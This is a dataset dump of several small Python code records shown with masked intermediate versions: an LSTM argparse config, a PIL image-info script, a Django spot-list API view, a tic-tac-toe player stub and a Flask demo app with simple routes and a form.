help='')\nnet_arg.add_argument('--fast_layers', type=int, default=2, help='')\nnet_arg.add_argument('--zoneout_c', type=float, default=0.5, help='')\nnet_arg.add_argument('--zoneout_h', type=float, default=0.9, help='')\nnet_arg.add_argument('--keep_prob', type=float, default=0.65, help='')\nnet_arg.add_argument('--input_dim', type=int, default=300, help='')\nnet_arg.add_argument('--num_glimpse', type=int, default=1, help='')\nnet_arg.add_argument('--use_terminal_symbol', type=str2bool, default=True,\n help='Not implemented yet')\ndata_arg = add_argument_group('Data')\ndata_arg.add_argument('--task', type=str, default='ptb')\ndata_arg.add_argument('--batch_size', type=int, default=128)\ndata_arg.add_argument('--vocab_size', type=int, default=50)\ndata_arg.add_argument('--input_size', type=int, default=300)\ndata_arg.add_argument('--min_data_length', type=int, default=5)\ndata_arg.add_argument('--max_data_length', type=int, default=80)\ndata_arg.add_argument('--train_num', type=int, default=1000000)\ndata_arg.add_argument('--valid_num', type=int, default=1000)\ndata_arg.add_argument('--test_num', type=int, default=1000)\ntrain_arg = add_argument_group('Training')\ntrain_arg.add_argument('--is_train', type=str2bool, default=True, help='')\ntrain_arg.add_argument('--optimizer', type=str, default='rmsprop', help='')\ntrain_arg.add_argument('--max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_step', type=int, default=1000000, help='')\ntrain_arg.add_argument('--init_scale', type=float, default=0.002, help='')\ntrain_arg.add_argument('--lr_start', type=float, default=0.01, help='')\ntrain_arg.add_argument('--lr_decay_step', type=int, default=5000, help='')\ntrain_arg.add_argument('--lr_decay_rate', type=float, default=0.1, help='')\ntrain_arg.add_argument('--max_grad_norm', type=float, default=1.0, help='')\ntrain_arg.add_argument('--checkpoint_secs', type=int, default=300, help='')\nmisc_arg = add_argument_group('Misc')\nmisc_arg.add_argument('--log_step', type=int, default=2, help='')\nmisc_arg.add_argument('--num_log_samples', type=int, default=3, 
help='')\nmisc_arg.add_argument('--log_level', type=str, default='INFO', choices=[\n 'INFO', 'DEBUG', 'WARN'], help='')\nmisc_arg.add_argument('--log_dir', type=str, default='logs')\nmisc_arg.add_argument('--data_dir', type=str, default='data')\nmisc_arg.add_argument('--output_dir', type=str, default='outputs')\nmisc_arg.add_argument('--data_path', type=str, default=\n '/Ujjawal/fast-slow-lstm/data')\nmisc_arg.add_argument('--debug', type=str2bool, default=False)\nmisc_arg.add_argument('--gpu_memory_fraction', type=float, default=1.0)\nmisc_arg.add_argument('--random_seed', type=int, default=123, help='')\n\n\ndef get_config():\n config, unparsed = parser.parse_known_args()\n return config\n", "step-4": "import argparse\nimport pickle\n\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\narg_lists = []\nparser = argparse.ArgumentParser()\n\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\nnet_arg = add_argument_group('Network')\nnet_arg.add_argument('--num_steps', type=int, default=150, help='')\nnet_arg.add_argument('--cell_size', type=int, default=700, help='')\nnet_arg.add_argument('--hyper_size', type=int, default=400, help='')\nnet_arg.add_argument('--embed_size', type=int, default=128, help='')\nnet_arg.add_argument('--hidden_size', type=int, default=256, help='')\nnet_arg.add_argument('--num_layers', type=int, default=2, help='')\nnet_arg.add_argument('--fast_layers', type=int, default=2, help='')\nnet_arg.add_argument('--zoneout_c', type=float, default=0.5, help='')\nnet_arg.add_argument('--zoneout_h', type=float, default=0.9, help='')\nnet_arg.add_argument('--keep_prob', type=float, default=0.65, help='')\nnet_arg.add_argument('--input_dim', type=int, default=300, help='')\nnet_arg.add_argument('--num_glimpse', type=int, default=1, help='')\nnet_arg.add_argument('--use_terminal_symbol', type=str2bool, default=True,\n help='Not implemented yet')\ndata_arg = add_argument_group('Data')\ndata_arg.add_argument('--task', type=str, default='ptb')\ndata_arg.add_argument('--batch_size', type=int, default=128)\ndata_arg.add_argument('--vocab_size', type=int, default=50)\ndata_arg.add_argument('--input_size', type=int, default=300)\ndata_arg.add_argument('--min_data_length', type=int, default=5)\ndata_arg.add_argument('--max_data_length', type=int, default=80)\ndata_arg.add_argument('--train_num', type=int, default=1000000)\ndata_arg.add_argument('--valid_num', type=int, default=1000)\ndata_arg.add_argument('--test_num', type=int, default=1000)\ntrain_arg = add_argument_group('Training')\ntrain_arg.add_argument('--is_train', type=str2bool, default=True, help='')\ntrain_arg.add_argument('--optimizer', type=str, default='rmsprop', help='')\ntrain_arg.add_argument('--max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_step', type=int, default=1000000, help='')\ntrain_arg.add_argument('--init_scale', type=float, default=0.002, help='')\ntrain_arg.add_argument('--lr_start', type=float, default=0.01, help='')\ntrain_arg.add_argument('--lr_decay_step', type=int, default=5000, help='')\ntrain_arg.add_argument('--lr_decay_rate', type=float, default=0.1, help='')\ntrain_arg.add_argument('--max_grad_norm', type=float, default=1.0, help='')\ntrain_arg.add_argument('--checkpoint_secs', type=int, default=300, help='')\nmisc_arg = add_argument_group('Misc')\nmisc_arg.add_argument('--log_step', type=int, default=2, 
help='')\nmisc_arg.add_argument('--num_log_samples', type=int, default=3, help='')\nmisc_arg.add_argument('--log_level', type=str, default='INFO', choices=[\n 'INFO', 'DEBUG', 'WARN'], help='')\nmisc_arg.add_argument('--log_dir', type=str, default='logs')\nmisc_arg.add_argument('--data_dir', type=str, default='data')\nmisc_arg.add_argument('--output_dir', type=str, default='outputs')\nmisc_arg.add_argument('--data_path', type=str, default=\n '/Ujjawal/fast-slow-lstm/data')\nmisc_arg.add_argument('--debug', type=str2bool, default=False)\nmisc_arg.add_argument('--gpu_memory_fraction', type=float, default=1.0)\nmisc_arg.add_argument('--random_seed', type=int, default=123, help='')\n\n\ndef get_config():\n config, unparsed = parser.parse_known_args()\n return config\n", "step-5": "#-*- coding: utf-8 -*-\nimport argparse\nimport pickle\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\narg_lists = []\nparser = argparse.ArgumentParser()\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\n# Network\nnet_arg = add_argument_group('Network')\nnet_arg.add_argument('--num_steps', type=int, default=150, help='')\nnet_arg.add_argument('--cell_size', type=int, default=700, help='')\nnet_arg.add_argument('--hyper_size', type=int, default=400, help='')\nnet_arg.add_argument('--embed_size', type=int, default=128, help='')\nnet_arg.add_argument('--hidden_size', type=int, default=256, help='')\nnet_arg.add_argument('--num_layers', type=int, default=2, help='')\nnet_arg.add_argument('--fast_layers', type=int, default=2, help='')\nnet_arg.add_argument('--zoneout_c', type=float, default=0.5, help='')\nnet_arg.add_argument('--zoneout_h', type=float, default=0.9, help='')\nnet_arg.add_argument('--keep_prob', type=float, default=0.65, help='')\nnet_arg.add_argument('--input_dim', type=int, default=300, help='')\nnet_arg.add_argument('--num_glimpse', type=int, default=1, help='')\nnet_arg.add_argument('--use_terminal_symbol', type=str2bool, default=True, help='Not implemented yet')\n\n# Data\ndata_arg = add_argument_group('Data')\ndata_arg.add_argument('--task', type=str, default='ptb')\ndata_arg.add_argument('--batch_size', type=int, default=128)\ndata_arg.add_argument('--vocab_size', type=int, default=50)\ndata_arg.add_argument('--input_size', type=int, default=300)\ndata_arg.add_argument('--min_data_length', type=int, default=5)\ndata_arg.add_argument('--max_data_length', type=int, default=80)\ndata_arg.add_argument('--train_num', type=int, default=1000000)\ndata_arg.add_argument('--valid_num', type=int, default=1000)\ndata_arg.add_argument('--test_num', type=int, default=1000)\n\n# Training / test parameters\ntrain_arg = add_argument_group('Training')\ntrain_arg.add_argument('--is_train', type=str2bool, default=True, help='')\ntrain_arg.add_argument('--optimizer', type=str, default='rmsprop', help='')\n\ntrain_arg.add_argument('--max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_max_epoch', type=int, default=200, help='')\n\n\ntrain_arg.add_argument('--max_step', type=int, default=1000000, help='')\ntrain_arg.add_argument('--init_scale', type=float, default=0.002, help='')\ntrain_arg.add_argument('--lr_start', type=float, default=0.01, help='')\ntrain_arg.add_argument('--lr_decay_step', type=int, default=5000, help='')\ntrain_arg.add_argument('--lr_decay_rate', type=float, default= 0.1, help='')\ntrain_arg.add_argument('--max_grad_norm', type=float, default=1.0, help='')\ntrain_arg.add_argument('--checkpoint_secs', 
type=int, default=300, help='')\n\n# Misc\nmisc_arg = add_argument_group('Misc')\nmisc_arg.add_argument('--log_step', type=int, default=2, help='')\nmisc_arg.add_argument('--num_log_samples', type=int, default=3, help='')\nmisc_arg.add_argument('--log_level', type=str, default='INFO', choices=['INFO', 'DEBUG', 'WARN'], help='')\nmisc_arg.add_argument('--log_dir', type=str, default='logs')\nmisc_arg.add_argument('--data_dir', type=str, default='data')\nmisc_arg.add_argument('--output_dir', type=str, default='outputs')\nmisc_arg.add_argument('--data_path', type=str, default='/Ujjawal/fast-slow-lstm/data' )\nmisc_arg.add_argument('--debug', type=str2bool, default=False)\nmisc_arg.add_argument('--gpu_memory_fraction', type=float, default=1.0)\nmisc_arg.add_argument('--random_seed', type=int, default=123, help='')\n\ndef get_config():\n config, unparsed = parser.parse_known_args()\n return config\n\n", "step-ids": [ 2, 3, 5, 6, 7 ] }
[ 2, 3, 5, 6, 7 ]
# -*- coding: utf-8 -*-
# !/usr/bin/env python3

import pathlib
from PIL import Image


if __name__ == '__main__':

    img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()

    # image load
    with Image.open(str(img_path)) as img:
        # image info
        print('IMAGE: {}'.format(str(img_path)))
        print('Image is in {} format'.format(img.format))
        print('Image size: width {} pixels, height {} pixels'.format(img.size[0], img.size[1]))
        print('Image color bands: {}'.format(img.mode))
        # image display
        img.show()
normal
{ "blob_id": "05edbf3662936465eee8eee0824d1a0cca0df0e5", "index": 4855, "step-1": "<mask token>\n", "step-2": "<mask token>\nif __name__ == '__main__':\n img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()\n with Image.open(str(img_path)) as img:\n print('IMAGE: {}'.format(str(img_path)))\n print('Image is in {} format'.format(img.format))\n print('Image size: width {} pixels, height {} pixels'.format(img.\n size[0], img.size[1]))\n print('Image color bands: {}'.format(img.mode))\n img.show()\n", "step-3": "import pathlib\nfrom PIL import Image\nif __name__ == '__main__':\n img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()\n with Image.open(str(img_path)) as img:\n print('IMAGE: {}'.format(str(img_path)))\n print('Image is in {} format'.format(img.format))\n print('Image size: width {} pixels, height {} pixels'.format(img.\n size[0], img.size[1]))\n print('Image color bands: {}'.format(img.mode))\n img.show()\n", "step-4": "# -*- coding: utf-8 -*-\n# !/usr/bin/env python3\n\nimport pathlib\nfrom PIL import Image\n\n\nif __name__ == '__main__':\n\n img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()\n\n # image load\n with Image.open(str(img_path)) as img:\n # image info\n print('IMAGE: {}'.format(str(img_path)))\n print('Image is in {} format'.format(img.format))\n print('Image size: width {} pixels, height {} pixels'.format(img.size[0], img.size[1]))\n print('Image color bands: {}'.format(img.mode))\n # image display\n img.show()\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*-
from rest_framework.views import APIView
from ..Models.ConnectToDBModel import *
from ..Models.RegionInfoModel import *
from .CommonView import *


def get_one_spot(region):
    # Build the response payload for a single spot record.
    comments_data = get_comment_data()

    data = {}
    data['id'] = region.id
    data['name'] = region.name
    data['address'] = region.address
    data['lng'] = region.lng
    data['lat'] = region.lat
    spot_comment_data = comments_data[comments_data['search_key'] == str(region.search_key)]
    data['commentNumber'] = spot_comment_data.iloc[:, 0].size
    data['commentScore'] = get_score(spot_comment_data['comment_score'].mean())
    return data


def get_spot_list(request):
    # decode the token
    # username = decodeToken(request)
    # print(username)
    res = {}
    try:
        list = [get_one_spot(region) for region in regioninfo.objects]
        # returns a list of all document objects
        res['list'] = list
        return json_response(res)
    except Exception:
        return json_error(error_string='查询发生错误', code=12, api="spotlist")


class SpotListView(APIView):

    def get(self, request, *args, **kwargs):
        try:
            return get_spot_list(request)
        except KeyError:
            return json_error(error_string="请求错误", code=500)
normal
{ "blob_id": "0b0b22043dda94ea57344fb3bf47255ad85c7f5b", "index": 1408, "step-1": "<mask token>\n\n\nclass SpotListView(APIView):\n <mask token>\n", "step-2": "<mask token>\n\n\ndef get_one_spot(region):\n comments_data = get_comment_data()\n data = {}\n data['id'] = region.id\n data['name'] = region.name\n data['address'] = region.address\n data['lng'] = region.lng\n data['lat'] = region.lat\n spot_comment_data = comments_data[comments_data['search_key'] == str(\n region.search_key)]\n data['commentNumber'] = spot_comment_data.iloc[:, 0].size\n data['commentScore'] = get_score(spot_comment_data['comment_score'].mean())\n return data\n\n\n<mask token>\n\n\nclass SpotListView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n return get_spot_list(request)\n except KeyError:\n return json_error(error_string='请求错误', code=500)\n", "step-3": "<mask token>\n\n\ndef get_one_spot(region):\n comments_data = get_comment_data()\n data = {}\n data['id'] = region.id\n data['name'] = region.name\n data['address'] = region.address\n data['lng'] = region.lng\n data['lat'] = region.lat\n spot_comment_data = comments_data[comments_data['search_key'] == str(\n region.search_key)]\n data['commentNumber'] = spot_comment_data.iloc[:, 0].size\n data['commentScore'] = get_score(spot_comment_data['comment_score'].mean())\n return data\n\n\ndef get_spot_list(request):\n res = {}\n try:\n list = [get_one_spot(region) for region in regioninfo.objects]\n res['list'] = list\n return json_response(res)\n except Exception:\n return json_error(error_string='查询发生错误', code=12, api='spotlist')\n\n\nclass SpotListView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n return get_spot_list(request)\n except KeyError:\n return json_error(error_string='请求错误', code=500)\n", "step-4": "from rest_framework.views import APIView\nfrom ..Models.ConnectToDBModel import *\nfrom ..Models.RegionInfoModel import *\nfrom .CommonView import *\n\n\ndef get_one_spot(region):\n comments_data = get_comment_data()\n data = {}\n data['id'] = region.id\n data['name'] = region.name\n data['address'] = region.address\n data['lng'] = region.lng\n data['lat'] = region.lat\n spot_comment_data = comments_data[comments_data['search_key'] == str(\n region.search_key)]\n data['commentNumber'] = spot_comment_data.iloc[:, 0].size\n data['commentScore'] = get_score(spot_comment_data['comment_score'].mean())\n return data\n\n\ndef get_spot_list(request):\n res = {}\n try:\n list = [get_one_spot(region) for region in regioninfo.objects]\n res['list'] = list\n return json_response(res)\n except Exception:\n return json_error(error_string='查询发生错误', code=12, api='spotlist')\n\n\nclass SpotListView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n return get_spot_list(request)\n except KeyError:\n return json_error(error_string='请求错误', code=500)\n", "step-5": "# -*- coding: utf-8 -*-\nfrom rest_framework.views import APIView\nfrom ..Models.ConnectToDBModel import *\nfrom ..Models.RegionInfoModel import *\nfrom .CommonView import *\n\n\n\ndef get_one_spot(region):\n\n comments_data = get_comment_data();\n\n data = {};\n data['id'] = region.id;\n data['name'] = region.name;\n data['address'] = region.address;\n data['lng'] = region.lng;\n data['lat'] = region.lat;\n spot_comment_data = comments_data[(comments_data['search_key'] == str(region.search_key))]\n data['commentNumber'] = spot_comment_data.iloc[:, 0].size;\n data['commentScore'] = get_score(spot_comment_data['comment_score'].mean());\n return data;\ndef 
get_spot_list(request):\n #进行解码token\n # username = decodeToken(request);\n # print(username);\n res = {};\n try:\n\n list = [get_one_spot(region) for region in regioninfo.objects];\n # 返回所有的文档对象列表\n res['list'] = list;\n return json_response(res);\n except Exception:\n return json_error(error_string='查询发生错误',code = 12,api = \"spotlist\");\n\n\n\nclass SpotListView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n\n return get_spot_list(request);\n except KeyError:\n return json_error(error_string=\"请求错误\", code=500);\n", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
class player:

    def __init__(self, name: str, symbol: str):
        self._name = name
        self._symbol = symbol

    def decide_next_move(self):
        """
        Checks all possible combinations to decide best next move
        :return: board position
        """
        pass

    def get_next_move(self):
        """
        Asks user for next move
        :return: board position
        """
        return int(input('Enter your move: '))
normal
{ "blob_id": "3cc894570189fe545f5db3150d0b69c16dc211dc", "index": 981, "step-1": "class player:\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "class player:\n\n def __init__(self, name: str, symbol: str):\n self._name = name\n self._symbol = symbol\n <mask token>\n <mask token>\n", "step-3": "class player:\n\n def __init__(self, name: str, symbol: str):\n self._name = name\n self._symbol = symbol\n <mask token>\n\n def get_next_move(self):\n \"\"\"\n Asks user for next move\n :return: board position\n \"\"\"\n return int(input('Enter your move: '))\n", "step-4": "class player:\n\n def __init__(self, name: str, symbol: str):\n self._name = name\n self._symbol = symbol\n\n def decide_next_move(self):\n \"\"\"\n Checks all possible combinations to decide best next move\n :return: board position\n \"\"\"\n pass\n\n def get_next_move(self):\n \"\"\"\n Asks user for next move\n :return: board position\n \"\"\"\n return int(input('Enter your move: '))\n", "step-5": null, "step-ids": [ 1, 2, 3, 4 ] }
[ 1, 2, 3, 4 ]
# -*- coding: utf-8 -*-
# @Time : 2020/6/26 11:02
# @Author : Ella
# @File : app.py
# @Software : PyCharm

import time
import datetime

from flask import Flask, render_template, request  # render_template renders HTML templates

app = Flask(__name__)  # initialise the application object


# Route resolution: match the path the user visits to the desired function
@app.route('/')
def hello_world():
    return '你好'


# Read a string parameter from the URL path
@app.route('/test1/<name>')
def test1(name):
    return '你好,%s' % name


# Read an integer parameter from the URL path; float is also supported
@app.route('/test2/<int:id>')
def test2(id):
    return '你好,%d' % id


# Return a rendered page to the user
# @app.route('/index1')
# def index1():
#     return render_template("index.html")


# Pass variables to the page
@app.route('/index1')
def index2():
    time = datetime.date.today()  # plain variable
    name = ['小新', '小英', '小红']  # list type
    task = {"任务": "打扫卫生", "时间": "3小时"}  # dict type
    return render_template("index.html", var=time, list=name, task=task)


# Form submission
@app.route('/test/register')
def register():
    return render_template("test/register.html")


# Route that receives the submitted form; methods must include POST
@app.route('/result', methods=['POST', 'GET'])
def result():
    if request.method == 'POST':
        result = request.form
        return render_template("test/result.html", result=result)


if __name__ == '__main__':
    app.run(debug=True)
normal
{ "blob_id": "d68bd9c90a106a9eac767607ad77bdd84d0f18d2", "index": 1006, "step-1": "<mask token>\n\n\[email protected]('/')\ndef hello_world():\n return '你好'\n\n\[email protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s' % name\n\n\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d' % id\n\n\n<mask token>\n\n\[email protected]('/test/register')\ndef register():\n return render_template('test/register.html')\n\n\[email protected]('/result', methods=['POST', 'GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template('test/result.html', result=result)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\[email protected]('/')\ndef hello_world():\n return '你好'\n\n\[email protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s' % name\n\n\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d' % id\n\n\[email protected]('/index1')\ndef index2():\n time = datetime.date.today()\n name = ['小新', '小英', '小红']\n task = {'任务': '打扫卫生', '时间': '3小时'}\n return render_template('index.html', var=time, list=name, task=task)\n\n\[email protected]('/test/register')\ndef register():\n return render_template('test/register.html')\n\n\[email protected]('/result', methods=['POST', 'GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template('test/result.html', result=result)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\[email protected]('/')\ndef hello_world():\n return '你好'\n\n\[email protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s' % name\n\n\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d' % id\n\n\[email protected]('/index1')\ndef index2():\n time = datetime.date.today()\n name = ['小新', '小英', '小红']\n task = {'任务': '打扫卫生', '时间': '3小时'}\n return render_template('index.html', var=time, list=name, task=task)\n\n\[email protected]('/test/register')\ndef register():\n return render_template('test/register.html')\n\n\[email protected]('/result', methods=['POST', 'GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template('test/result.html', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "import time\nimport datetime\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\n\n\[email protected]('/')\ndef hello_world():\n return '你好'\n\n\[email protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s' % name\n\n\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d' % id\n\n\[email protected]('/index1')\ndef index2():\n time = datetime.date.today()\n name = ['小新', '小英', '小红']\n task = {'任务': '打扫卫生', '时间': '3小时'}\n return render_template('index.html', var=time, list=name, task=task)\n\n\[email protected]('/test/register')\ndef register():\n return render_template('test/register.html')\n\n\[email protected]('/result', methods=['POST', 'GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template('test/result.html', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-5": "#-*- coding = utf-8-*-\n#@Time : 2020/6/26 11:02\n#@Author :Ella\n#@File :app.py\n#@Software : PyCharm\n\nimport time\nimport datetime\n\nfrom flask import Flask,render_template,request #render_template渲染模板\napp = Flask(__name__) #初始化的对象\n\n#路由解析,通过用户访问的路径,匹配想要的函数\[email protected]('/')\ndef hello_world():\n return '你好'\n\n#通过访问路径,获取用户的字符串参数\[email protected]('/test1/<name>')\ndef test1(name):\n return 
'你好,%s'%name\n\n#通过访问路径,获取用户的整形参数 此外,还有float类型\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d'%id\n\n#返回给用户渲染后的网页文件\n# @app.route('/index1')\n# def index1():\n# return render_template(\"index.html\")\n\n#向页面传递变量\[email protected]('/index1')\ndef index2():\n time = datetime.date.today() #普通变量\n name = ['小新','小英','小红'] #列表类型\n task = {\"任务\":\"打扫卫生\",\"时间\":\"3小时\"} #字典类型\n return render_template(\"index.html\",var = time,list = name,task = task)\n\n#表单提交\[email protected]('/test/register')\ndef register():\n return render_template(\"test/register.html\")\n\n#接受表单提交的路由,需要指定methods为post\[email protected]('/result',methods = ['POST','GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template(\"test/result.html\",result = result)\n\nif __name__ == '__main__':\n app.run(debug=True)", "step-ids": [ 5, 6, 7, 9, 10 ] }
[ 5, 6, 7, 9, 10 ]